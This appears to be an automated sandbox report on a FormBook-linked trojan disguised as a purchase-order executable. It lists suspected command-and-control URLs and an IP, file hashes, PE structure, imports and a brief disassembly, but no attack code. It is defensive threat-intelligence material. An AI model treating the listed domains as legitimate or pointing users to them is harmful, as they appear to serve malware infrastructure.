https://outlook.com | explorer.exe, 00000003.00000000.2059543443.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3292694913.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095180726.0000000009B8A000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.6282.xyz/ge07/ | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.g18q11a.top/ge07/ | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.lasterdeals.shop | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.rkgexg.top/ge07/www.9net88.net | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.oal-ahzgwo.xyz/ge07/www.epehr.pics | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.9net88.net/ge07/www.ecurityemployment.today | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.oal-ahzgwo.xyzReferer: | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.9net88.net | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.sfmoreservicesllc.latReferer: | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.rowadservepros.netReferer: | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.wner-nyquh.xyz | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ostcanadantpl.top/ge07/www.rkgexg.top | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.6282.xyz/ge07/www.ostcanadantpl.top | explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://android.notify.windows.com/iOS | explorer.exe, 00000003.00000002.3289689202.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095465738.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2057742779.00000000076F8000.00000004.00000001.00020000.00000000.sdmp | false | |
                                                      high
                                                      http://www.g18q11a.top/ge07/www.rowadservepros.netexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.zoc-marriage.xyzReferer:explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.zoc-marriage.xyz/ge07/www.g18q11a.topexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.f7y2i9fgm.xyz/ge07/explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.oal-ahzgwo.xyzexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.rkgexg.topReferer:explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://api.msn.com/explorer.exe, 00000003.00000000.2059543443.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291923932.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.epehr.picsReferer:explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://crl.vexplorer.exe, 00000003.00000000.2055532925.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3285665342.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.ecurityemployment.todayexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.zoc-marriage.xyz/ge07/explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
156.235.1.30 | www.6282.xyz | Seychelles | 40065 | CNSERVERSUS | true
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1548508
                                                          Start date and time:2024-11-04 15:27:06 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 8m 19s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:9
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:1
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:Purchase order MIPO2425110032.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.evad.winEXE@1033/1@5/1
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 49
                                                          • Number of non-executed functions: 307
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • VT rate limit hit for: Purchase order MIPO2425110032.exe
Time | Type | Description
09:28:00 | API Interceptor | 1512533x Sleep call for process: explorer.exe modified
09:28:48 | API Interceptor | 2031885x Sleep call for process: ipconfig.exe modified
                                                          No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
94950.bodis.com | PI916810.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | SALES ORDER875.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | Invoice & Packing list For Sea Shipment.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | Invoice Packing list For Sea Shipment.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | Invoice Packing list For Sea Shipment.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | OVERDUE BALANCE.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | PO23100072.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | PO-000001488.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | Enquiry.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | Amended Proforma #U2013 SMWD5043.exe | malicious | FormBook | 199.59.243.227
www.6282.xyz | Invoice & Packing list For Sea Shipment.exe | malicious | FormBook | 156.235.1.30
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CNSERVERSUS | nan.elf | malicious | Mirai, Moobot | 154.90.62.9
CNSERVERSUS | 4.elf | malicious | Mirai, Moobot | 154.90.62.9
CNSERVERSUS | na.elf | malicious | Mirai | 23.228.57.202
CNSERVERSUS | la.bot.mips.elf | malicious | Unknown | 154.91.164.199
CNSERVERSUS | m68k.elf | malicious | Mirai, Moobot | 41.216.185.134
CNSERVERSUS | mpsl.elf | malicious | Mirai, Moobot | 41.216.185.111
CNSERVERSUS | P8CHOkdp62.elf | malicious | Mirai, Moobot | 154.90.62.9
CNSERVERSUS | na.elf | malicious | Unknown | 154.90.62.142
CNSERVERSUS | na.elf | malicious | Unknown | 154.90.62.142
CNSERVERSUS | na.elf | malicious | Unknown | 154.90.62.142
                                                          No context
                                                          No context
                                                          Process:C:\Users\user\Desktop\Purchase order MIPO2425110032.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):189440
                                                          Entropy (8bit):7.866184617462391
                                                          Encrypted:false
                                                          SSDEEP:3072:8PCjh43NRsUfH8V6GQFnUnbN3h5UfcODxBRPUZiIsLTP/3IS7BtWAy7/1ZOcT:8at434MSvIUbBh5U17RPMifLDXd7yPT
                                                          MD5:B8F460AB9C986BBF3A449307FD86C814
                                                          SHA1:1A42EF2F1BCDA1BF8ED4DB87663FCB69FE8B09FA
                                                          SHA-256:ACB60DCDCDE4CB4D52CF8A8F057D1DC0C4B04EEB50F6F604FC88D4F20E2B98AB
                                                          SHA-512:C85E8284106BC2B46CE04790A8D784F3206FC0D675C282166DAC9185A504B6EC03E622382C2B00800691D49773A84925AEC4B44B4E6942973A8749626A8A60F3
                                                          Malicious:false
                                                          Reputation:low
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.212908697725054
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:Purchase order MIPO2425110032.exe
                                                          File size:1'312'891 bytes
                                                          MD5:85c1c3e112a22e4f23eaf97d86fef355
                                                          SHA1:4922c4f1c57d740ad9f7d46bba1b18f8744277db
                                                          SHA256:88e7becf09f33e1db8fe108dbe9687a13bf1225ecf322a00f2e67b86a8931813
                                                          SHA512:80929585d61a0af38166c0d6b94bcc852dc05025537ec9915441ef78f270cf4759ea05f28604f63f8193e31474d6e88a81aabe725c24a8cb839cf9e1fa560f0b
                                                          SSDEEP:24576:mRmJkcoQricOIQxiZY1iaI9tlv4ngXMKFXV7KeTFjt84:jJZoQrbTFZY1iaI/N4gXMKJV7Kv4
                                                          TLSH:5855CF11AC8C9466C1622173DE3AF77A96346D26137791EB37C85E3729B03C25B3A336
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                          Icon Hash:c58ee08c9594cd55
                                                          Entrypoint:0x4165c1
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:0
                                                          File Version Major:5
                                                          File Version Minor:0
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:0
                                                          Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                          Instruction
                                                          call 00007F42E0BCA75Bh
                                                          jmp 00007F42E0BC15CEh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          push edi
                                                          push esi
                                                          mov esi, dword ptr [ebp+0Ch]
                                                          mov ecx, dword ptr [ebp+10h]
                                                          mov edi, dword ptr [ebp+08h]
                                                          mov eax, ecx
                                                          mov edx, ecx
                                                          add eax, esi
                                                          cmp edi, esi
                                                          jbe 00007F42E0BC174Ah
                                                          cmp edi, eax
                                                          jc 00007F42E0BC18E6h
                                                          cmp ecx, 00000080h
                                                          jc 00007F42E0BC175Eh
                                                          cmp dword ptr [004A9724h], 00000000h
                                                          je 00007F42E0BC1755h
                                                          push edi
                                                          push esi
                                                          and edi, 0Fh
                                                          and esi, 0Fh
                                                          cmp edi, esi
                                                          pop esi
                                                          pop edi
                                                          jne 00007F42E0BC1747h
                                                          jmp 00007F42E0BC1B22h
                                                          test edi, 00000003h
                                                          jne 00007F42E0BC1756h
                                                          shr ecx, 02h
                                                          and edx, 03h
                                                          cmp ecx, 08h
                                                          jc 00007F42E0BC176Bh
                                                          rep movsd
                                                          jmp dword ptr [00416740h+edx*4]
                                                          mov eax, edi
                                                          mov edx, 00000003h
                                                          sub ecx, 04h
                                                          jc 00007F42E0BC174Eh
                                                          and eax, 03h
                                                          add ecx, eax
                                                          jmp dword ptr [00416654h+eax*4]
                                                          jmp dword ptr [00416750h+ecx*4]
                                                          nop
                                                          jmp dword ptr [004166D4h+ecx*4]
                                                          nop
                                                          inc cx
                                                          add byte ptr [eax-4BFFBE9Ah], dl
                                                          inc cx
                                                          add byte ptr [ebx], ah
                                                          ror dword ptr [edx-75F877FAh], 1
                                                          inc esi
                                                          add dword ptr [eax+468A0147h], ecx
                                                          add al, cl
                                                          jmp 00007F42E3039F47h
                                                          add esi, 03h
                                                          add edi, 03h
                                                          cmp ecx, 08h
                                                          jc 00007F42E0BC170Eh
                                                          rep movsd
                                                          jmp dword ptr [00000000h+edx*4]
                                                          Programming Language:
                                                          • [ C ] VS2010 SP1 build 40219
                                                          • [C++] VS2010 SP1 build 40219
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
                                                          • [ASM] VS2010 SP1 build 40219
                                                          • [RES] VS2010 SP1 build 40219
                                                          • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x3a818 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x3a818 | 0x3aa00 | ca10a7d76f98eb421efae1a9194d40a8 | False | 0.31944213086353945 | data | 5.766607496882607 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
--- | --- | --- | --- | --- | --- | ---
RT_ICON | 0xab748 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.5150709219858156
RT_ICON | 0xabbb0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xabcd8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xabe00 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xabf28 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.37682926829268293
RT_ICON | 0xac590 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.478494623655914
RT_ICON | 0xac878 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | Great Britain | 0.514344262295082
RT_ICON | 0xaca60 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.49324324324324326
RT_ICON | 0xacb88 | 0x6ed1 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9985195107335472
RT_ICON | 0xb3a60 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.570362473347548
RT_ICON | 0xb4908 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.6430505415162455
RT_ICON | 0xb51b0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | Great Britain | 0.5616359447004609
RT_ICON | 0xb5878 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.4125722543352601
RT_ICON | 0xb5de0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | Great Britain | 0.13950668401750857
RT_ICON | 0xc6608 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | Great Britain | 0.22774332562539415
RT_ICON | 0xcfab0 | 0x67e8 | Device independent bitmap graphic, 80 x 160 x 32, image size 26560 | English | Great Britain | 0.23240601503759398
RT_ICON | 0xd6298 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | Great Britain | 0.25914972273567466
RT_ICON | 0xdb720 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | Great Britain | 0.24728389230042513
RT_ICON | 0xdf948 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.3354771784232365
RT_ICON | 0xe1ef0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.3778142589118199
RT_MENU | 0xe2f98 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xe2fe8 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xe30e8 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xe3618 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xe3ca8 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
RT_STRING | 0xe4178 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xe4778 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xe4dd8 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xe5160 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xe52b8 | 0x102 | data | English | Great Britain | 0.6162790697674418
RT_GROUP_ICON | 0xe53c0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xe53d8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xe53f0 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xe5408 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xe55a8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
--- | ---
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, 